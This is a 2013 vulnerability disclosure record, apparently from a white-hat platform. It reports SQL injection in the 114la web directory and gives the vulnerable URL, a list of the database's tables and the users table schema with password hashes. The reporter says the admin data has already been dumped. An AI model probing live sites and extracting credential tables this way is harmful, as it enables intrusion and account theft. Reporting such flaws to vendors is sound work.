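2013-09-24: Details reported to the vendor; awaiting vendor handling
2013-09-24: Vendor has confirmed; details disclosed to the vendor only
2013-10-04: Details disclosed to core white hats and experts in related fields
2013-10-14: Details disclosed to regular white hats
2013-10-24: Details disclosed to intern white hats
2013-11-08: Details disclosed to the public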
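As the title says.
Here is an SQL injection in the 114la web directory (114啦网址导航). I have already read out the administrator data; decrypting it on cmd5 turned out to be a paid lookup, sigh. Address: http://app.114la.com/?q=88952634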
Database: 114la_app
[45 tables]
+-----------------------------+
| `ylmf_link_2013-07-23`      |
| app                         |
| category                    |
| hotcity                     |
| test                        |
| tool_add_postcode           |
| tool_food_introduction      |
| tool_food_type              |
| tool_hdjr                   |
| tool_hdjr_scgj              |
| tool_history_day_event      |
| tool_history_day_list       |
| tool_jidanci                |
| tool_jidanci_type           |
| tool_mobile                 |
| tool_train                  |
| tool_train_checi            |
| tool_train_detail           |
| tool_train_province         |
| tool_train_province_station |
| tool_train_station          |
| tool_train_station_union    |
| tool_tv_city                |
| tool_tv_province            |
| tool_tv_station             |
| tool_zip_city               |
| tool_zip_country            |
| tool_zip_province           |
| tool_zip_tw                 |
| tool_zip_village            |
| users                       |
| users_admin_log             |
| users_login_history         |
| users_purview               |
| users_purview_config        |
| ylmf                        |
| ylmf_city                   |
| ylmf_city_bk                |
| ylmf_foreign                |
| ylmf_link                   |
| ylmf_link1                  |
| ylmf_link_2                 |
| ylmf_scenery                |
| ylmf_weather                |
| ylmf_weather_id             |
+-----------------------------+
Database: 114la_app
Table: users
[11 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | varchar(50)      |
| groups    | varchar(100)     |
| loginip   | varchar(15)      |
| logintime | int(10) unsigned |
| pools     | varchar(20)      |
| regip     | varchar(15)      |
| regtime   | int(11)          |
| sta       | smallint(6)      |
| uid       | int(10) unsigned |
| user_name | varchar(20)      |
| userpwd   | char(32)         |
+-----------+------------------+
See the detailed description.
Admins, please fix this.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-09-24 11:48
Thank you very much!
None yet